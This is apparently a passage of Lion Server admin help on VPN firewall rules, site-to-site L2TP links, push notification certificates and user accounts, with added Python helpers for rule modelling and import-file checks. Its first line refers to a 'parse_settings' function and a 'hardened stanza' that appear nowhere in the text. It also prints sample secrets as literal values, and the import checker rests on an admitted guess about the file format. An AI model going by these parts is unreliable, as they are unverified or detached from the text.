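Feed the real output of sudo serveradmin settings vpn to parse_settings and review the findings; the hardened stanza turns PPTP off, so only paste it once no client still depends on PPTP, and remember that every client's VPN configuration must receive the new shared secret.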

Network infrastructure services

VPN

Manage VPN

Limit VPN access to specific IP addresses


You limit access to the VPN by using Firewall service.

When configuring the firewall for L2TP and PPTP, you must configure GRE, ESP, and IKE to permit VPN access through the firewall. By default, Firewall service blocks incoming VPN connections, but you can provide limited VPN access to specific IP addresses for security or ease of administration.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings.
5. Select Advanced, then click the Add button (+).
6. From the Action pop-up menu, choose Allow.
7. From the Protocol pop-up menu, choose an option. If you use L2TP for VPN access, choose UDP. If you use PPTP for VPN access, choose TCP.
8. From the Service pop-up menu, choose VPN L2TP or VPN PPTP. The relevant destination port is added to the Port field.
9. (Optional) Select the Log all packets matching this rule checkbox.
10. From the address pop-up menu of the Source section, choose Other and enter the source IP address range (using CIDR notation) that you want to give access to the VPN. You can also specify a port in the Port field of the Source section. Computers that have an IP address in the IP address range that you specified in the source IP address field, communicating on the source port you specified, can connect to the VPN service.
11. From the Destination Address pop-up menu, choose the address group that contains the VPN server (for the destination of filtered traffic). If you don't want to use an existing address group, select Other and enter the destination IP address range (with CIDR notation). You can also specify a port in the Port field of the Destination section.
12. From the Interface pop-up menu that this rule applies to, choose In. In refers to the packets coming into the server.
13. Click OK.
14. Click the Add button (+).
15. From the Action pop-up menu, choose Allow.
16. From the Protocol pop-up menu, choose a protocol or Other: If you are adding GRE or ESP, choose Other and enter any in the field. If you are adding VPN ISAKMP/IKE, choose UDP.
17. From the Service pop-up menu, choose a service: If you are adding GRE, choose GRE - Generic Routing Encapsulation protocol. If you are adding ESP, choose ESP - Encapsulating Security Payload protocol. If you are adding VPN ISAKMP/IKE, choose VPN ISAKMP/IKE. Destination port 500 is added to the Port field.
18. From the Address pop-up menu of the Source section, choose any.
19. In the Port field of the Source section, enter any.
20. From the Address pop-up menu of the Destination section, choose any.
21. In the Port field of the Destination section, enter a port number. If you are adding VPN ISAKMP/IKE, enter 500 if it is not shown.
22. From the Interface pop-up menu, choose Other and enter any in the Other field of the Interface section.
23. Click OK.
24. Repeat steps 14 through 23 for GRE, ESP, and VPN ISAKMP/IKE.
25. Click Save to apply the filter immediately.
Note that steps 14 through 24 open IKE, GRE, and ESP from any source; only the L2TP or PPTP rule from steps 5 through 13 is limited to your chosen source range. If you want the IPSec negotiation itself restricted to those addresses, use the same source range in the ISAKMP/IKE and ESP rules, and add IKE NAT Traversal (UDP port 4500) if clients connect from behind NAT.
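The procedure above is easier to reason about as a first-match rule list with a default deny, which is how the firewall's Advanced rules behave. The following Python is an added example, not Apple's code, and it does not drive ipfw or Server Admin: it models the rules the procedure creates and evaluates constructed packets against them, so you can confirm that L2TP (UDP 1701) and PPTP (TCP 1723) are reachable only from your chosen source range while ISAKMP/IKE (UDP 500), GRE (IP protocol 47) and ESP (IP protocol 50) are open from anywhere, exactly as the steps instruct. Addresses are taken from the documentation ranges and are constructed.

```python
"""Model and test the Lion Firewall rules from Limit VPN access to specific IP addresses.

Added example, not Apple's code. Rules are evaluated first match wins, and a
packet no rule matches is denied, mirroring the text's note that incoming VPN
connections are blocked by default. All addresses are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

ANY = ipaddress.ip_network("0.0.0.0/0")


@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    proto: str                   # "udp", "tcp", "gre", "esp" or "any"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    dport: Optional[int] = None  # None means any destination port (GRE/ESP have none)
    interface: str = "in"        # "in" for packets arriving at the server, or "any"
    log: bool = False            # the optional "Log all packets matching this rule"


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    dport: Optional[int] = None
    interface: str = "in"


def matches(rule: Rule, pkt: Packet) -> bool:
    if rule.interface not in ("any", pkt.interface):
        return False
    if rule.proto not in ("any", pkt.proto):
        return False
    if rule.dport is not None and rule.dport != pkt.dport:
        return False
    return (ipaddress.ip_address(pkt.src) in rule.src
            and ipaddress.ip_address(pkt.dst) in rule.dst)


def decide(rules: List[Rule], pkt: Packet) -> str:
    """First matching rule wins; no match means the packet is denied."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "deny"


def vpn_rules(allowed_sources: List[str], vpn_server: str, pptp: bool = False) -> List[Rule]:
    """Rules equivalent to the procedure: the tunnel port only from the listed
    source ranges, and IKE, GRE and ESP from anywhere."""
    server = ipaddress.ip_network(vpn_server)
    rules: List[Rule] = []
    for cidr in allowed_sources:
        src = ipaddress.ip_network(cidr)
        rules.append(Rule("allow", "udp", src, server, 1701, log=True))   # VPN L2TP
        if pptp:
            rules.append(Rule("allow", "tcp", src, server, 1723, log=True))  # VPN PPTP
    rules.append(Rule("allow", "udp", ANY, ANY, 500, interface="any"))      # ISAKMP/IKE
    rules.append(Rule("allow", "gre", ANY, ANY, interface="any"))           # GRE
    rules.append(Rule("allow", "esp", ANY, ANY, interface="any"))           # ESP
    return rules


if __name__ == "__main__":
    rules = vpn_rules(["203.0.113.0/24"], "198.51.100.10/32", pptp=True)
    probes = [
        Packet("udp", "203.0.113.7", "198.51.100.10", 1701),   # branch office L2TP
        Packet("udp", "192.0.2.9", "198.51.100.10", 1701),     # L2TP from elsewhere
        Packet("udp", "192.0.2.9", "198.51.100.10", 500),      # IKE from anywhere
        Packet("esp", "192.0.2.9", "198.51.100.10"),           # ESP from anywhere
        Packet("tcp", "203.0.113.7", "198.51.100.10", 1723),   # branch office PPTP
        Packet("tcp", "203.0.113.7", "198.51.100.10", 22),     # unrelated service
    ]
    for pkt in probes:
        print(f"{pkt.proto:4} {pkt.src:>13} dport={pkt.dport} -> {decide(rules, pkt)}")
```

Because vpn_rules reproduces the procedure, it also reproduces its looseness: IKE, GRE and ESP answer any source, so only the L2TP and PPTP control traffic is actually limited. To tighten that, pass the same source networks to the IKE and ESP rules instead of ANY, and add a UDP 4500 rule for clients behind NAT.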

Network infrastructure services

VPN

Manage VPN

View VPN status


You can view VPN status information by using the serveradmin command-line tool. You can see whether the L2TP and PPTP protocols are enabled, how many clients are connected, when the service started, and where log files are located. For information about serveradmin, see its man page.

View VPN status
Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo serveradmin status vpn

View detailed VPN status
Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo serveradmin fullstatus vpn

Network infrastructure services

VPN

Manage VPN

View the VPN log


You can monitor the VPN log from the command line. Monitoring VPN logs helps you make sure your VPN is running properly, and VPN logs can help you troubleshoot problems. For information about tail, see its man page.

View a VPN log
Open Terminal (located in /Applications/Utilities/), and enter:
$ tail log-file
To keep watching as new entries arrive, use tail -f log-file instead.

View the log path
Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo serveradmin command vpn:command = getLogPaths

Network infrastructure services

VPN

Manage VPN

Link remote networks


You can us e a VPN to link a computer to a main network, and you can also link networks.

When two networks are linked they can interact as if they are physically connected. Each site must have its own connection to the Internet, but the private data is sent encrypted between the sites. This type of link is useful for connecting satellite offices to an organization's main office LAN.

Linking multiple remote LAN sites to a main LAN requires using the s2svpnadmin command-line utility to administer site-to-site VPN. To use s2svpnadmin you need root privilege access through sudo. For more about s2svpnadmin, see the s2svpnadmin man page.

Linking multiple remote LAN sites to a main LAN can require the creation of a security certificate. The s2svpnadmin tool can create links using shared-secret authentication (both sites have a password in their configuration files) or certificate authentication. To use certificate authentication, you must create the certificate before running s2svpnadmin.

You can only make site-to-site VPN connections using L2TP/IPSec VPN connections. You cannot link two sites using PPTP and these instructions.

This example uses the following settings (the shared secret shown is a documentation example; choose your own):

Setting                                                               Description or example
Desired VPN type                                                      L2TP
Authentication                                                        Using shared secret
Shared secret                                                         prDwkj49fd!254
Internet or public IP address of the VPN main LAN gateway (Site 1)    A.B.C.D
Internet or public IP address of the VPN remote LAN gateway (Site 2)  W.X.Y.Z
Private IP address of site 1                                          192.168.0.1
Private IP address of site 2                                          192.168.20.1
Private network IP address range and netmask for site 1               192.168.0.0-192.168.0.255 (also expressed as 192.168.0.0/24 or 192.168.0.0:255.255.255.0)
Private network IP address range and netmask for site 2               192.168.20.0-192.168.20.255 (also expressed as 192.168.20.0/24 or 192.168.20.0:255.255.255.0)
Organization's DNS IP address                                         192.168.0.2

The result of this configuration is an auxiliary, remote LAN, connected to a main LAN using L2TP. The two private subnets must not overlap: a /16 mask on site 1 (192.168.0.0/16) would swallow site 2's 192.168.20.0/24 and break routing between them.

Run s2svpnadmin on both site gateways
1. Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo s2svpnadmin
2. Enter the relevant number for Configure a new site-to-site server.
3. Enter an identifying configuration name (no spaces). For this example, you could enter site_1 on site 1's gateway, and so on.
4. Enter the gateway's public IP address. For this example, enter A.B.C.D on site 1's gateway and W.X.Y.Z on site 2's gateway.
5. Enter the other site's public IP address. For this example, enter W.X.Y.Z on site 1's gateway and A.B.C.D on site 2's gateway.
6. Enter s for shared secret authentication, and enter the shared secret prDwkj49fd!254. If you are using certificate authentication, enter c and choose the installed certificate you want to use.
7. Enter at least one addressing policy for the configuration.
8. Enter a local subnet network address (for example, 192.168.0.0 for site 1 and 192.168.20.0 for site 2).
9. For the address range, enter the prefix bits in CIDR notation. In this example, the CIDR notation for the local subnet is 192.168.0.0/24 for site 1, so you enter 24.
10. Enter a remote subnet network address (for example, 192.168.20.0 for site 1 and 192.168.0.0 for site 2).
11. For the address range, enter the prefix bits in CIDR notation. In this example, the CIDR notation for the remote subnet is 192.168.20.0/24 for site 1, so you enter 24.
12. If you have more addressing policies, enter them now; otherwise, press Return.
If you had more sites to connect or a more complex address setup (linking only parts of your main LAN and the remote LAN), you would make more addressing policies for this site configuration now. Repeat steps 7 through 12 for each new addressing policy.
13. Press y to enable the site configuration.
You can verify your settings by choosing to show the configuration details of the server and entering the configuration name (in this example, site_1).
14. Exit s2svpnadmin.

Configure the firewall on both site gateways
1. Create an address group for each server with only the server's public IP address. In this example, name the first group Site 1 and enter the public IP address of the server. Then name the second group Site 2 and enter the public IP address of the other server.
2. Open the firewall to external VPN connections by enabling L2TP (port 1701) connections and IKE NAT Traversal (port 4500) in the any address group.
3. Create the following Advanced IP filter rules on both site gateways:
Filter rule   Action   Protocol              Source Address   Destination Address   Interface
Rule 1        Allow    UDP                   Site 1           Site 2                Other; enter isakmp
Rule 2        Allow    UDP                   Site 2           Site 1                Other; enter isakmp
Rule 3        Allow    Other; enter esp      Site 1           Site 2
Rule 4        Allow    Other; enter esp      Site 2           Site 1
Rule 5        Allow    Other; enter ipencap  Site 1           Site 2
Rule 6        Allow    Other; enter ipencap  Site 2           Site 1
Rule 7        Allow    Other; enter gre      Site 1           Site 2
Rule 8        Allow    Other; enter gre      Site 2           Site 1

These rules permit the encrypted traffic to be passed to both hosts.

4. Save your changes.
5. Start or restart the firewall, as needed.

Start VPN service on both site gateways

1. For both VPN gateways, open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. Select VPN from the expanded Servers list. If you used s2svpnadmin correctly, the Start button should be enabled and ready to use.
4. Click Start VPN.

You should now be able to access a computer on the remote LAN from the local LAN. To verify the link, use ping or some other means.
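The values s2svpnadmin asks for in steps 8 through 11 (subnet address plus prefix bits) and the eight mirrored filter rules above are easy to get wrong by hand, and a mismatch between the dotted range and its CIDR form, or an overlap between the local and remote subnets, silently breaks routing across the tunnel. The following helpers are an added example for planning that input; they are not part of the manual, of s2svpnadmin, or of the Server Admin firewall. The Site 1 / Site 2 names and the addresses are the manual's own placeholders.

```python
"""Planning helpers for a site-to-site L2TP/IPsec link between two gateways.

Added example: not the Lion Server manual's code and not part of the
s2svpnadmin tool. It computes the prefix bits s2svpnadmin asks for from a
dotted netmask or from an address range, checks that the local and remote
subnets of an addressing policy do not overlap, and lists the eight firewall
filter rules from the manual for two address groups.
"""
import ipaddress

# Protocols the manual's filter rules allow between the two gateways, as
# (protocol, port) pairs. isakmp is IKE over UDP; esp, ipencap and gre are
# IP protocols rather than ports, so they carry no port.
VPN_PROTOCOLS = (("UDP", "isakmp"), ("esp", None), ("ipencap", None), ("gre", None))


def prefix_bits(netmask: str) -> int:
    """CIDR prefix length for a dotted netmask, e.g. 255.255.255.0 -> 24."""
    return ipaddress.IPv4Network(f"0.0.0.0/{netmask}").prefixlen


def range_prefix_bits(first: str, last: str) -> int:
    """Prefix length of the single CIDR block covering exactly first..last.

    Raises ValueError when the range is not one whole block, so the number
    is checked before it is typed into s2svpnadmin.
    """
    blocks = list(ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)))
    if len(blocks) != 1:
        raise ValueError(f"{first}-{last} is not a single CIDR block")
    return blocks[0].prefixlen


def range_matches(first: str, last: str, cidr: str) -> bool:
    """True when the dotted range and the CIDR form describe the same subnet."""
    blocks = list(ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)))
    return len(blocks) == 1 and blocks[0] == ipaddress.IPv4Network(cidr)


def policy_is_routable(local_cidr: str, remote_cidr: str) -> bool:
    """False when the local and remote subnets of an addressing policy
    overlap; overlapping policies make routing across the tunnel ambiguous."""
    local = ipaddress.IPv4Network(local_cidr)
    remote = ipaddress.IPv4Network(remote_cidr)
    return not local.overlaps(remote)


def filter_rules(site1: str = "Site 1", site2: str = "Site 2") -> list:
    """Rules 1-8 from the manual as (action, protocol, source, destination, port).

    Every protocol is allowed in both directions, which is why the manual's
    table has a mirrored pair of rules per protocol.
    """
    rules = []
    for proto, port in VPN_PROTOCOLS:
        for src, dst in ((site1, site2), (site2, site1)):
            rules.append(("Allow", proto, src, dst, port))
    return rules


if __name__ == "__main__":
    print(prefix_bits("255.255.255.0"))                          # 24
    print(range_prefix_bits("192.168.20.0", "192.168.20.255"))   # 24
    print(range_matches("192.168.0.0", "192.168.0.255", "192.168.0.0/16"))  # False
    print(policy_is_routable("192.168.0.0/24", "192.168.20.0/24"))          # True
    for rule in filter_rules():
        print(rule)
```

Run range_matches against each row of the settings table before starting: a range of 256 addresses only matches a /24, and the check fails loudly for any other prefix. policy_is_routable is worth running for every addressing policy you add in step 12, since the tool accepts overlapping subnets without complaint.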

Network infrastructure services

Push Notification

About push notification


Push notification provides increased server responsiveness to clients and reduced server load.

What is it?

Push notification lets a server notify a user of changes (a new email, or an event change), without the user requesting an update. A service (like iCal or mail) maintains a simple connection with the client, and the service informs the client that there's new data. This differs from previous methods (polling or pull notification), where calendar and mail applications contacted the server at regular intervals requesting data. Using the polling method of notification, the server must attend to each request, no matter whether the user has new data waiting. With the push method of client updating, only users with new data are contacted, and only as needed. For best server performance, use push notification. It makes your server more responsive and reduces server workload.

Lion Server push notification cannot host third-party iOS apps' push notifications. Lion Server push notification does provide push notification for mail, calendar, and Address Book services hosted on Lion Server and accessed using Apple's iOS clients (Mail, Calendar, Contacts).

What uses it?

Push notification is available for the following services:
Address Book service
iCal service
Mail service

Push notification service must be running the same OS version as every service using it, even if the services aren't running on the same server. Clients must support push notification to make use of it. Apple's client applications on Mac OS X v10.6 and iOS 5.0 client applications support push notification service. Third-party client applications may support it.

To make a secure connection between the server and the clients, you need a transport encryption certificate installed on the server and ready for use. Apple provides a transport encryption certificate when you provide an Apple ID and password in the push notification settings.
RELATED TOPICS

Start push notification service
Change a push certificate's Apple ID
Revoke push notification connection permission
Renew a push notification certificate
Push notification certificate

Push notification certificate


To secure push notifications, supply your organization's Apple ID and password. Do not use a personal Apple ID (for example, one that's already associated with iTunes or Apple's Developer Center).

Before enabling push notification

To enable secure push notifications, you need an encryption certificate. Apple can issue a certificate to someone with a known identity, such as an Apple ID. The Server app uses this certificate signed by Apple to encrypt push notifications from the server to any client that needs a notification.
Apple ID
  Description: This is the user name registered with Apple. Use an Apple ID associated with your organization, and not a personal Apple ID.
  Example: my_business@example.com
Password
  Description: This is the password associated with the Apple ID, not the administrator password for the server.
  Example: jCvuZvRMIvTTY1
Acquire Certificate
  Description: Click to continue enabling push notifications.
Create one now.
  Description: Click to open Safari to a webpage for creating or retrieving an Apple ID.

After enabling push notification

Once you enable push notification, you can change the Apple ID associated with the certificate, renew the certificate, or revoke the certificate.

Apple ID
  Description: This is the user name registered with Apple.
  Action: Click Change to reissue a certificate under a different Apple ID.
Expires
  Description: The certificate is good until the listed date. You must renew the certificate to avoid interrupted service.
  Action: Click Renew to reissue a certificate with the same Apple ID, but with an extended expiration date.
Manage your certificates
  Description: This is a link to the Apple Push Certificates Portal. You revoke compromised certificates using the portal.
  Action: Click the phrase to open the correct URL in Safari.

RELATED TOPICS

About push notification
Start push notification service
Change a push certificate's Apple ID
Revoke push notification connection permission
Renew a push notification certificate

Revoke push notification connection permission


To forcibly disable push notifications, you revoke the connection's encryption certificate. After you revoke the certificate, your server can no longer send push notifications.

If the private key portion of your certificate is compromised, revoke the certificate. A compromised certificate can't ensure authenticity, integrity, or privacy of push notifications. This means users can't trust that push notifications came from your server, weren't tampered with in transit, and haven't been seen surreptitiously. The private key is a file and can be compromised by theft of the server, the disk it's stored on, or its backup media. The private key can also be compromised by anyone who has access to your server.

1. Log in to the Apple Push Certificates Portal. Sign in with the Apple ID you used to request the certificate.
2. In the Mac OS X Server Certificates section, locate the certificate for the desired server.
3. Click Revoke in the Actions column, and confirm the action.
4. When you finish, sign out.

RELATED TOPICS

About push notification
Start push notification service
Change a push certificate's Apple ID
Renew a push notification certificate
Push notification certificate

Start push notification service


You enable push notification using the Server app. When you enable push notification, you must supply an Apple ID associated with your organization. Using a personal Apple ID isn't recommended. You must have, or be ready to create, an Apple ID before you can turn on the service.

1. Select the server in the Hardware section of the Server app sidebar.
2. Select Enable Apple push notifications.
3. Enter the Apple ID and password. If you don't have an Apple ID for your organization, follow the link to create one.
4. Click Get certificate.

RELATED TOPICS

About push notification
Change a push certificate's Apple ID
Revoke push notification connection permission
Renew a push notification certificate
Push notification certificate

Renew a push notification certificate


You must periodically renew certificates used to provide encrypted notification. Renewing a certificate creates a new certificate with a new expiration date.

1. Select the server in the Hardware section of the Server app sidebar.
2. Next to Enable Apple push notifications, click Edit.
3. Next to the expiration date, click Renew.
4. Supply the Apple ID and password.
5. Click Renew certificate.

RELATED TOPICS

About push notification
Start push notification service
Change a push certificate's Apple ID
Revoke push notification connection permission
Push notification certificate

Change a push certificate's Apple ID


If you previously enabled push notification and acquired a certificate from Apple, you can change the Apple ID associated with the certificate.

WARNING: Changing your Apple ID replaces the existing certificate and disrupts notifications to registered devices. Users must reregister their Macs and iOS devices with the Apple Push Notification Service.

1. Select the server in the Hardware section of the Server app sidebar.
2. Next to Enable Apple push notifications, click Edit.
3. Next to the Apple ID, click Change. A warning states that changing the Apple ID disrupts existing push notifications until users reregister their devices with the service.
4. Read the warning and click Continue.
5. Supply the Apple ID and password.
6. Click Renew certificate.

RELATED TOPICS

About push notification
Start push notification service
Revoke push notification connection permission
Renew a push notification certificate
Push notification certificate

Lion Server user management

Manage users and groups

About tools for client management


You can manage client accounts using the Server app, the Profile Manager website, and Workgroup Manager. Ideally, you create and manage accounts in the Server app, and configure and manage preferences and application settings in the Profile Manager website.

In the Users and Groups panes of the Server app, you can configure essential user and group account settings. In the service panes of the Server app, you can configure and turn on services for these users and groups.

In the Profile Manager website, you can create configuration profiles, which configure preferences, install certificates, and change application settings. You access the Profile Manager website by clicking links in the Profile Manager pane of the Server app. You can deploy configuration profiles over a network, or distribute them using email or the web. You can use configuration profiles to manage computers, and mobile devices such as iPhone, iPod touch, or iPad.

Workgroup Manager is an app you can use to configure user and group account settings and manage preferences. You can't configure or turn on services for users and groups. You can manage computers but you can't manage mobile devices. For more information about Workgroup Manager, see User Management for Mac OS X Server v10.6 at support.apple.com/manuals/.
RELATED TOPICS

About user accounts
About configuration profiles

About accounts

About administrator accounts


You need an administrator account on your server to create user accounts, create groups, change server settings, and perform other tasks using the Server app. With an administrator account, you can also make changes to locked preferences in System Preferences, install software on the server, and perform other tasks that standard users can't.

Initially, your server has a primary administrator account but no other administrator accounts. If you enable a network account server (also known as a directory server) on the server, your server will have a primary administrator account and a directory administrator account.

Primary administrator account

The server always has a primary administrator account, whose name and password you entered while setting up the server. The primary administrator account is stored in the server's local directory with user accounts you create in the Users & Groups pane of System Preferences. You can use this administrator account on the server, and you can use it to manage your server over the network from another Mac.

Directory administrator account

By default, Mac OS X Lion includes a local directory, but doesn't enable a network account server, which manages network accounts. In the Server app, you can enable a network account server. If your server has a network account server, the server also has a directory administrator account. This account has the password you entered during setup, but its name is Directory Administrator and its short name is diradmin. If you migrated to Mac OS X Lion from Mac OS X Server v10.6, the name and short name of the directory administrator account are migrated over.

The directory administrator account is stored in the network account server, along with user accounts you create in the Users pane of the Server app. If a malfunction makes the primary administrator account unusable, you can use the server's directory administrator account to authenticate in the Server app and manage the server locally or remotely.

By default, the directory administrator account isn't shown in the Users pane of the Server app. You can view the directory administrator and all other administrator and system accounts by choosing View > Show System Accounts.

Primary and directory administrator accounts compared

The following table compares the primary administrator account and the directory administrator account.

Feature                                          Primary administrator     Directory administrator
Name and short name                              Specified during setup    Directory Administrator and diradmin
Stored in the server's local directory           Yes                       No
Stored in the server's network account server    No                        Yes
Can be used from an administrator computer       Yes                       Yes

Administrators on an upgraded server

If your server was previously upgraded or migrated from a standard or workgroup configuration of Mac OS X Server v10.5 Leopard, you have different administrator accounts. Your primary administrator account is in your server's directory. This is a directory administrator account, and it has the name and short name specified during Leopard Server setup. You also have an administrator account stored on your server, and it has the name Local Administrator and short name localadmin. For more information about these accounts, see Getting Started for Mac OS X Server v10.5. It's available on the Apple Manuals website at support.apple.com/manuals/.

Administrator account security

To keep your server secure:
- Don't share an administrator name or password with anyone.
- Log out when you leave your server, or set up a locked screen saver using the Security pane of System Preferences. If you leave your server while you're logged in and the screen is unlocked, someone could make changes using your administrator privileges.
- Turn off Automatic login in the Users & Groups pane, under Login Options of System Preferences. If the server logs in as an administrator, someone can restart the server to gain access as an administrator.
- For added security, routinely log in on the server using a standard user account. Use your administrator name and password when you open the Server app or another application that requires administrator privileges.
RELATED TOPICS

View system and administrator accounts
About user accounts

About user accounts


User accounts on your server let users gain access to services provided by the server. A user account contains the information needed to prove the user's identity for services that require authentication. A user account also provides a centralized place to store a user's contact information and other data.

You can add user accounts in the Users pane of the Server app by:
- Creating accounts
- Importing existing accounts, if your organization has a network account server (also known as a directory server) that your server is connected to
- Importing from a file

You can import user accounts individually. You can also automatically import all user accounts that are members of a group.

The Users pane of the Server app lists local user accounts (including user accounts created in System Preferences), network accounts stored in your server's network account server, and imported user accounts.

Local user accounts

Users with administrator privileges on their Macs can create local user accounts using the Users & Groups pane of System Preferences. These local user accounts are stored on the user's computer. Local user accounts have home folders on the computer and can be used to log in to the computer. Users can't use their computer's local user accounts to access the server over the network. Users can use the server's local user accounts to access the server over the network.

Like users' Macs, your server has local accounts in addition to server accounts and, possibly, imported accounts. Your server's local accounts can be used to log in to the server, and a local account with administrator privileges can be used to administer the server. For information about administrator privileges, see About administrator accounts.

Network accounts

Network accounts are stored in your server's network account server or in a connected network account server. You can use Server app or Server Admin to enable a network account server on your server. If you don't enable the network account server, then all accounts you create on the server are stored in the server's local directory. Accounts stored in the server's local directory can be used to authenticate to services hosted by the server but they can't be used to log in.

Imported user accounts

Imported user accounts remain in your organization's network account server. Imported user accounts can access your server's services. You can let imported users administer your server, or be a member of groups stored on your server. When someone uses an imported user account, your server combines the account information stored in the network account server with additional privileges given by your server.

Types of user accounts compared

Your server can have its own network accounts or use accounts from an existing network server. You can also import accounts, which stores a synced copy of the network account from another network server on your network server. Here's a comparison of the four types of accounts:

Where the account is stored:
  Local accounts: Local directory
  Network accounts on your server: Local network server
  Network accounts from an existing network server: Another network server
  Imported accounts: Another network server, synced to local network server

Who creates this:
  Local accounts: A user with an administrator account on the computer using System Preferences, or using the Server app if the server's network account server is disabled, or Workgroup Manager
  Network accounts on your server: You (a server administrator), using the Server app or Workgroup Manager
  Network accounts from an existing network server: The network account server's administrator
  Imported accounts: The network account server's administrator

Membership in network groups:
  Allowed for all four account types

System Preferences support:
  Local accounts: Allows editing (including changing the password), local group membership
  Network accounts on your server: Can change password
  Network accounts from an existing network server: Can change password
  Imported accounts: Can change password

Local access to server's services:
  Full access for all four account types

Remote access to server's services:
  Local accounts: Full access
  Network accounts on your server: Full access
  Network accounts from an existing network server: Wiki only
  Imported accounts: Full access

Access to group shared folders:
  Local accounts: Full access
  Network accounts on your server: Full access
  Network accounts from an existing network server: Wiki only
  Imported accounts: Full access

Home folder on server:
  Local accounts: Yes
  Network accounts on your server: Yes
  Network accounts from an existing network server: No
  Imported accounts: No

RELATED TOPICS

About administrator accounts
Create a user account
Import users from another network account server
Import users and groups from a file

Work with users

Import users and groups from a file


You can import users and groups from XML or character-delimited text files, which is an easy way to quickly set up accounts. You can use Workgroup Manager or the dsexport command-line tool to create XML or character-delimited text files of accounts in your network server. For more information about Workgroup Manager, see User Management for Mac OS X Server v10.6 at support.apple.com/manuals/. For information about how to use dsexport, enter man dsexport in Terminal.

You assign passwords to users after importing, because passwords aren't included in import files.

1. If your server is not set up to host network accounts, set it up to do so. When you're viewing the Server app, if the Manage > Manage Network Accounts option is listed, your server is not set up to host network accounts. For information about setting up your server to host network accounts, see Host network accounts.
2. In the Server app, choose Manage > Import Accounts from File.
3. Select the file to import and then click Open.
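Because the Server app imports whatever the file contains, it is worth checking a character-delimited file before step 2: that it parses, that no record name or user ID is duplicated, and that it does not carry a Password attribute (passwords are assigned after import, and a file with plaintext passwords in it is a liability on every disk and backup it touches). The following checker is an added example; it is not the manual's code and not Apple's dsimport tool. It assumes the header layout I know from dsimport and dsexport files: four hex delimiter codes (end of record, escape, field separator, value separator), the record type, the attribute count and the attribute names, followed by one record per line. The sample file and the account names in it are constructed.

```python
"""Pre-flight check of a character-delimited account import file.

Added example, not code from the manual or from Apple's dsimport tool. The
header layout assumed here (four hex delimiter codes, record type, attribute
count, attribute names) is the dsimport/dsexport layout as I know it; the
sample file below is constructed for this example.
"""

SAMPLE_IMPORT = (
    "0x0A 0x5C 0x3A 0x2C dsRecTypeStandard:Users 4 "
    "dsAttrTypeStandard:RecordName dsAttrTypeStandard:RealName "
    "dsAttrTypeStandard:UniqueID dsAttrTypeStandard:PrimaryGroupID\n"
    "jdoe:John Doe:1025:20\n"
    "asmith,alice:Alice Smith:1026:20\n"
)

PASSWORD_ATTR = "dsAttrTypeStandard:Password"
RECORD_NAME_ATTR = "dsAttrTypeStandard:RecordName"
UNIQUE_ID_ATTR = "dsAttrTypeStandard:UniqueID"


def split_escaped(text, sep, escape):
    """Split text on sep; a sep preceded by the escape character is kept literally."""
    parts, current, i = [], [], 0
    while i < len(text):
        ch = text[i]
        if ch == escape and i + 1 < len(text):
            current.append(text[i + 1])
            i += 2
            continue
        if ch == sep:
            parts.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    parts.append("".join(current))
    return parts


def parse_import_file(text):
    """Return {'record_type': str, 'attributes': [...], 'records': [dict, ...]}.

    Each record maps an attribute name to its list of values (a field may hold
    several values separated by the value separator, e.g. two record names).
    The header is assumed to be newline-terminated; records are split on the
    end-of-record delimiter declared in the header.
    """
    header, _, body = text.partition("\n")
    fields = header.split(" ")
    end_rec, escape, field_sep, value_sep = (chr(int(code, 16)) for code in fields[:4])
    record_type, count = fields[4], int(fields[5])
    attributes = fields[6:6 + count]
    if len(attributes) != count:
        raise ValueError("header attribute count does not match the attribute names")
    records = []
    for raw in body.split(end_rec):
        if not raw:
            continue
        values = split_escaped(raw, field_sep, escape)
        if len(values) != count:
            raise ValueError(f"record {raw!r} has {len(values)} fields, expected {count}")
        records.append({attr: (split_escaped(val, value_sep, escape) if val else [])
                        for attr, val in zip(attributes, values)})
    return {"record_type": record_type, "attributes": attributes, "records": records}


def import_problems(text):
    """List what to fix before choosing Manage > Import Accounts from File."""
    try:
        parsed = parse_import_file(text)
    except ValueError as exc:
        return [f"malformed file: {exc}"]
    problems = []
    if PASSWORD_ATTR in parsed["attributes"]:
        problems.append("file carries a Password attribute; assign passwords after import instead")
    seen_names, seen_uids = set(), set()
    for rec in parsed["records"]:
        for name in rec.get(RECORD_NAME_ATTR, []):
            if name in seen_names:
                problems.append(f"duplicate record name {name}")
            seen_names.add(name)
        for uid in rec.get(UNIQUE_ID_ATTR, []):
            if uid in seen_uids:
                problems.append(f"duplicate UniqueID {uid}")
            seen_uids.add(uid)
    return problems


if __name__ == "__main__":
    for problem in import_problems(SAMPLE_IMPORT) or ["no problems found"]:
        print(problem)
```

To check a real export, read the file into a string and pass it to import_problems; an empty list means the file is ready for step 2.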

RELATED TOPICS

Use advanced tools for more services
Host network accounts
Reset a user's password
Change a user's account settings
Create a user account
Create groups

Delete a user account


You can use the Server app to delete user accounts that are no longer needed. Deleting a user account cancels its group memberships and stops its access to group services and private wikis. Deleting a user account also deletes the user's mail stored on the server. A deleted user account can no longer access calendars and address book information on the server.

Deleting a user account doesn't remove the user's backup data. If the Time Machine preferences on the deleted user's computer were set to use the server for backup storage, the user's backup data remains in /Shared Items/Backups/ on the backup disk specified in the Time Machine pane of the Server app.

1. In the Users pane of the Server app, select the user account to delete.
2. Click the Delete button (-).

RELATED TOPIC

Create a user account

Change a user's account settings


You can change a user's name, picture, administrator privileges, and the groups the user is in. You can also edit advanced user settings such as the user ID, the group the user belongs in, the user's short name, other short names for the user (also known as aliases), the login shell, and the home folder. These advanced settings are set when you create or import the user account. Be careful when changing these settings, because invalid settings can prevent the user from logging in.

Change basic user account settings

1. In the Users pane of the Server app, double-click a user account. The user's account information is shown.
2. Do the following:

Change the user's name
